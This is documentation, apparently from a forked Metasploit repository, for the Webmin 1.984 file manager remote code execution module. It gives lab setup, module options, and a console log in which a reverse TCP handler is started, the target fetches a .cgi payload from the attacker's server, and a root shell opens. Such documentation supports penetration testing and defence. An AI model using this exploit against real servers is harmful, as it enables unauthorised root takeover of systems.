adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1314f5d0bbb547dbceefeb8da2e01abfbc07d936
metasploit-gs/documentation/modules/exploit/linux/http/webmin_file_manager_rce.md
T
cgranleese-r7 469f102596 Updates docs to reflect new default prompt
2025-07-17 09:53:40 +01:00

2.4 KiB
Raw Blame History

Vulnerable Application

In Webmin v1.984, any authenticated low privilege user without access rights to the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and changing file permissions (chmod). It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those functionalities in the file manager.

Setup, on Ubuntu 20.04

wget https://download.webmin.com/devel/deb/webmin_1.984_all.deb
sudo dpkg -i  webmin_1.984_all.deb

Webmin should now be installed. The credentials for the web UI will be the same as the user that installed Webmin

Options

USERNAME

A specific username to authenticate as

PASSWORD

A specific password to authenticate with

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/linux/http/webmin_file_manager_rce
  3. Set the RHOST, USERNAME, and PASSWORD options
  4. Run the module
  5. Receive a session as the root user.

Scenarios

Webmin 1.984, on Ubuntu 20.04

msf > exploit/linux/http/webmin_file_manager_rce
[*] Using exploit/linux/http/webmin_file_manager_rce
msf exploit(linux/http/webmin_file_manager_rce) > set password notpassword
password => notpassword
msf exploit(linux/http/webmin_file_manager_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(linux/http/webmin_file_manager_rce) > set rhosts 172.16.199.132
rhosts => 172.16.199.132
msf exploit(linux/http/webmin_file_manager_rce) > set username msfuser
username => msfuser
msf exploit(linux/http/webmin_file_manager_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://172.16.199.1:8080/tmBFT82mvsHD
[*] Attempting to authenticate with Webmin
[+] Authentication successful
[*] Downloading remote url
[*] Fetching payload from HTTP server
[*] Request 'GET /tmBFT82mvsHD.cgi'
[*] Sending payload ...
[*] Finished downloading remote url
[*] Modifying the permissions of the uploaded payload to 0755
[+] Deleted /usr/share/webmin/tmBFT82mvsHD.cgi
[*] Command shell session 9 opened (172.16.199.1:4444 -> 172.16.199.132:58058) at 2022-10-25 16:21:02 -0400
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Reference in New Issue View Git Blame Copy Permalink